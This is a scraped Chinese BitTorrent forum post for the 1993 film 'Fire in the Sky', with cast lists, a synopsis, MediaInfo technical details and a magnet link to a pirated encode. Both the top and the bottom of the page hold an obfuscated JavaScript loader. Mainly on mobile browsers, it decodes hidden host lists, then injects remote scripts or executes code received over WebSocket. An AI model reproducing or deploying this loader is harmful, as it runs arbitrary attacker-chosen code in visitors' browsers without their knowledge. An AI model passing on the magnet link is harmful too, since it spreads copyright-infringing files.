外星追缉令[中文字幕].Fire.in.the.Sky.1993.1080p.BluRay.DTS.x265-10bit 12.08GB

版主小s 28天前 240

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 外星追缉令

◎片 名 Fire in the Sky

◎年 代 1993

◎产 地 美国

◎类 别 剧情 / 科幻 / 悬疑 / 恐怖

◎语 言 英语

◎上映日期 1993-03-12

◎IMDb链接 https://www.imdb.com/title/tt0106912/

◎豆瓣评分 6.2/10 (1669人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304551/

◎片 长 109 分钟

◎导 演 罗伯特·里伯曼 Robert Lieberman (id:1322255)

◎编 剧 Tracy Tormé Tracy Tormé (id:1000822)

◎演 员 D·B·斯威尼 D.B. Sweeney (id:1040624)

罗伯特·帕特里克 Robert Patrick (id:1041135)

克莱格·谢佛 Craig Sheffer (id:1048157)

亨利·托马斯 Henry Thomas (id:1055549)

詹姆斯·加纳 James Garner (id:1002702)

罗伯特·科瓦吕比亚 Robert Covarrubias (id:1074663)

彼得·博格 Peter Berg (id:1031938)

布拉德利·格雷格 Bradley Gregg (id:1040753)

罗伯特·比赫莱尔 Robert Biheller (id:1019565)

查理·朗 Charley Lang (id:1041932)

凯瑟琳·威尔霍特 Kathleen Wilhoite (id:1054573)

Courtney Esler Courtney Esler (id:1088908)

诺布尔·威林厄姆 Noble Willingham (id:1167853)

乔·维赞 Joe Wizan (id:1301132)

Wolfgang Glattes Wolfgang Glattes (id:1284967)

Tracy Tormé Tracy Tormé (id:1000822)

托德·布莱克 Todd Black (id:1005356)

Nilo Rodis-Jamero Nilo Rodis-Jamero (id:1295855)

马克·艾沙姆 Mark Isham (id:1050293)

比尔·波普 Bill Pope (id:1018460)

Debi Manwiller Debi Manwiller (id:1290934)

Richard Pagano Richard Pagano (id:1293795)

Sharon Bialy Sharon Bialy (id:1278589)

Daniel Loren May Daniel Loren May (id:1291350)

马克·W·曼斯布里奇 Mark W. Mansbridge (id:1290903)

劳伦斯·本奈特 Laurence Bennett (id:1278355)

乔·汤普金斯 Joe I. Tompkins (id:1299373)

Nina Paskowitz Nina Paskowitz (id:1294045)

肯·切斯 Ken Chase (id:1280527)

Martin Jedlicka Martin Jedlicka (id:1287645)

迈克尔·欧文斯 Michael Owens (id:1293758)

史蒂夫·高利 Steve Gawley (id:1284643)

Jean Bolte Jean Bolte (id:1278923)

迈克尔·欧文斯 Michael Owens (id:1293758)

Mark Moore Mark Moore (id:1133960)

爱德华·赫希 Edward Hirsh (id:1286690)

唐·比斯 Don Bies (id:1061497)

Guy Hudson Guy Hudson (id:1287083)

迈克·史密斯森 Mike Smithson (id:1297961)

罗伯特·韦弗 Robert Weaver (id:1300543)

◎标 签 科幻 / 美国 / 悬疑 / 外星人 / 恐怖 / 1993 / 第三类接触 / 美国电影

◎简 介

本片根据一桩真实事件改编。在1975年11月5日晚上,在亚利桑那州的荒野山林中,五位伐木工人宣称亲眼目睹他们的同伴崔维斯(DB史威尼饰)被天外幽浮给绑架了。镇上居民认为他们头脑有问题,当地警长(詹姆斯嘉纳饰)则认为他们是在掩饰一桩命案,这种说法是要妨碍警方调查。然而,事情的真相自然唯有当事...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 275868965223841271750858611108499904467 (0xCF8A6E1A0FD2E99DD658EADB5DAF57D3)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.1 GiB

  8. Duration : 1 h 49 min

  9. Overall bit rate : 15.8 Mb/s

  10. Movie name : Fire in the Sky 1993 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-11-04 23:28:07

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 49 min

  21. Bit rate : 14.3 Mb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.380

  31. Stream size : 10.9 GiB (90%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 49 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.15 GiB (10%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 45 min

  62. Bit rate : 29.2 kb/s

  63. Count of elements : 2269

  64. Stream size : 22.0 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 45 min

  76. Bit rate : 30.0 kb/s

  77. Count of elements : 2269

  78. Stream size : 22.6 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:10:28.545 : en:Chapter 02

  86. 00:22:04.156 : en:Chapter 03

  87. 00:35:34.341 : en:Chapter 04

  88. 00:44:14.110 : en:Chapter 05

  89. 00:50:57.137 : en:Chapter 06

  90. 00:59:04.583 : en:Chapter 07

  91. 01:05:30.885 : en:Chapter 08

  92. 01:17:17.758 : en:Chapter 09

  93. 01:23:02.686 : en:Chapter 10

  94. 01:35:13.875 : en:Chapter 11

  95. 01:44:30.347 : en:Chapter 12




复制代码


TAGS 剧情 恐怖 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:72F4E70C8A0809091AD73D46563F6D5AE1706E9E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};